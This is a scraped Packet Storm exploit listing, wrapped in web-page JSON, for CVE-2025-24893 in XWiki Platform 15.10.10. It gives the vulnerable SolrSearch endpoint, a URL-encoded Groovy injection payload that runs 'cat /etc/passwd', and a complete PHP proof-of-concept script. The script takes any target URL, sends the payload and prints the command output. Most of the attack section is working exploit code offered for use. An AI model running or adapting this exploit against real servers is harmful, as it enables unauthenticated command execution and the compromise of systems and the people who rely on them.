{“lastseen”:”2025-11-26T18:13:40″,”description”:”XWiki Platform version 15.10.10 suffers from a critical unauthenticated remote command execution vulnerability through the SolrSearch endpoint. The issue is patched in versions 15.10.11, 16.4.1, and 16.5.0RC1…”,”published”:”2025-11-26T00:00:00″,”modified”:”2025-11-26T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 XWiki Platform 15.10.10 Remote Command Execution”,”source”:””,”references”:””,”id”:”PACKETSTORM:212110″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-24893″],”sourceData”:”=============================================================================================================================================\\n | # Title : XWiki Platform 15.10.10 php code injection |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.1 (64 bits) |\\n | # Vendor : https:\/\/www.xwiki.org\/ |\\n =============================================================================================================================================\\n \\n [+] Summary : \\n \\n XWiki Platform suffers from a **critical RCE vulnerability** allowing **unauthenticated remote command execution** through the vulnerable `SolrSearch` endpoint.\\n An attacker can execute arbitrary system commands as the server\u2019s running user, \\n leading to complete compromise of confidentiality, integrity, and availability.\\n \\n The issue is patched in versions **15.10.11**, **16.4.1**, and **16.5.0RC1**.\\n \\n ——————————————————————————-\\n \\n ## 2. Technical Details\\n \\n The vulnerability exists in the following endpoint: \/bin\/get\/Main\/SolrSearch?media=rss\\u0026text=\\n \\n By injecting malicious Groovy code inside the Solr search template, \\n a remote attacker can execute system commands such as:\\n \\n cat \/etc\/passwd\\n whoami\\n id\\n \\n Example injection payload (URL-encoded): }}}{{async async=false}}{{groovy}}println(\\”cat \/etc\/passwd\\”.execute().text){{\/groovy}}{{\/async}}\\n \\n The vulnerable endpoint processes the Groovy code **without authentication**.\\n \\n \\n [+] References : ( CVE-2025-24893 ) \\n \\n 1. Save the file as: poc.php\\n \\n 2.Execute: php poc.php http:\/\/127.0.0.1\\n \\n \\n [+] POC\\n \\n \\u003c?php\\n \/*\\n * XWiki Platform – php Code injection (CVE-2025-24893)\\n * by: Indoushka\\n *\/\\n \\n function banner() {\\n echo str_repeat(\\”=\\”, 80) . PHP_EOL;\\n echo \\” XWiki Platform – Remote Code Execution (CVE-2025-24893)\\” . PHP_EOL;\\n echo \\” Exploit Author: Al Baradi Joy\\” . PHP_EOL;\\n echo \\” PHP Version by: Indoushka\\” . PHP_EOL;\\n echo str_repeat(\\”=\\”, 80) . PHP_EOL;\\n }\\n \\n function detectProtocol($domain) {\\n $https = \\”https:\/\/{$domain}\\”;\\n $http = \\”http:\/\/{$domain}\\”;\\n \\n echo \\”[*] Detecting protocol…\\\\n\\”;\\n \\n $context = stream_context_create([\\”http\\” =\\u003e [\\”timeout\\” =\\u003e 5]]);\\n \\n if (@file_get_contents($https, false, $context) !== false) {\\n echo \\”[\u2714] Target supports HTTPS: $https\\\\n\\”;\\n return $https;\\n }\\n \\n echo \\”[!] HTTPS failed, trying HTTP…\\\\n\\”;\\n \\n if (@file_get_contents($http, false, $context) !== false) {\\n echo \\”[\u2714] Target supports HTTP: $http\\\\n\\”;\\n return $http;\\n }\\n \\n echo \\”[\u2716] Target unreachable via HTTP\/HTTPS.\\\\n\\”;\\n exit;\\n }\\n \\n function exploit($target) {\\n $clean = str_replace([\\”http:\/\/\\”, \\”https:\/\/\\”], \\”\\”, $target);\\n $base = detectProtocol($clean);\\n \\n $payload = \\”%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7d\\”.\\n \\”println(%22cat%20\/etc\/passwd%22.execute().text)\\”.\\n \\”%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d\\”;\\n \\n $url = $base . \\”\/bin\/get\/Main\/SolrSearch?media=rss\\u0026text=\\” . $payload;\\n \\n echo \\”[+] Sending exploit to: $url\\\\n\\”;\\n \\n $response = @file_get_contents($url);\\n \\n if ($response \\u0026\\u0026 strpos($response, \\”root:\\”) !== false) {\\n echo \\”[\u2714] Exploit Successful! Output:\\\\n\\\\n\\”;\\n echo $response . \\”\\\\n\\”;\\n } else {\\n echo \\”[\u2716] Exploit failed or no useful output.\\\\n\\”;\\n if ($response) echo $response;\\n }\\n }\\n \\n banner();\\n \\n if ($argc \\u003c 2) {\\n echo \\”Usage: php {$argv[0]} \\u003ctarget_url\\u003e\\\\n\\”;\\n echo \\”Example: php {$argv[0]} xwiki.example.com\\\\n\\”;\\n exit;\\n }\\n \\n $target = $argv[1];\\n exploit($target);\\n ?\\u003e\\n \\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/212110″,”cvss”:{“score”:9.8,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/212110\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-11-26T18:13:40″,”description”:”XWiki Platform version 15.10.10 suffers from a critical unauthenticated remote command execution vulnerability through the SolrSearch endpoint. The issue is patched in versions 15.10.11, 16.4.1,…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,13,53,7,11,5],"class_list":["post-27747","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n